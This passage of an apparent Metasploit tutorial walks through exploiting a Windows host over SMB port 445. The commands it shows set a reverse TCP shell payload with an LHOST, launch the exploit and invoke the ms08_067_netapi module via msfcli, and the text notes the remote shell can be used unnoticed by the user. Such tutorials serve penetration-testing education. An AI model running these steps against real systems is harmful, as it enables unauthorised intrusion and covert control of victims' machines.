<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > set payload windows/shell/reverse_tcp</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Again, configure its parameters, such as LHOST, which is the IP address from where the exploitation is executing, as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_317457" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > set LHOST 192.168.40.129</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW8.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW8.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Everything is configured such as RHOST, LHOST, and automatic target up till now. So it is time to check whether this exploit would penetrate the target computer or not. We can confirm the vulnerable status using the <em>check</em> command as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW9.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW9.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This command shows the status that the SMB exploit successfully worked and the target computer is vulnerable. Finally, launch or execute the exploit using this command:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_854419" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > exploit</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The moment we run this command, the exploit penetrates the remote computer and we get access to its command prompt. It is also showing which operating system is running on the target side:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW10.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW10.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Here, we can manipulate the remote computer shell to suit our needs, for instance enumerate the directory list, remove or create new files, etc., without being noticed by the actual user, as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW11.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW11.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We have exploited port 445 of the target computer, so we can confirm the communication socket created over the target computer using <em>netstat</em> command as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW12.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW12.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 13pt;"><strong><em>Msfcli (Command Line)</em></strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
To open “<em>msfcli</em>“, go to <strong>Backtrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework| Msfcli </strong>or use the terminal to execute the following commands:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_830124" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
<div class="line number2 index1 alt1" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
2</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># cd /pentest/exploits/framework3/</code></div>
<div class="line number2 index1 alt1" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># ./msfconsole</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The <em>msfcli </em>is has less functionality and is a bit more complex than <em>msfconsole</em>, but it could able to exploit the target in just one segment of commands. The exploit names and options are likely to be same as in the Metasploit console, but the<em>mode </em>values are unique to the CLI as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW13.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW13.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_92281" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># ./msfcli exploit/windows/smb/ms08_067_netapi</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Here, we are employing a little bit different exploit in <em>msfconsole</em> than earlier, in order to access the Windows server computer remote shell. Place the exploit name, right after . /msfcli and place ‘O’ which specifies options related to this exploit as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW14.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW14.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
By default, this exploit leaves the RHOST option blank, so set the remote computer IP using this command:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_279308" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
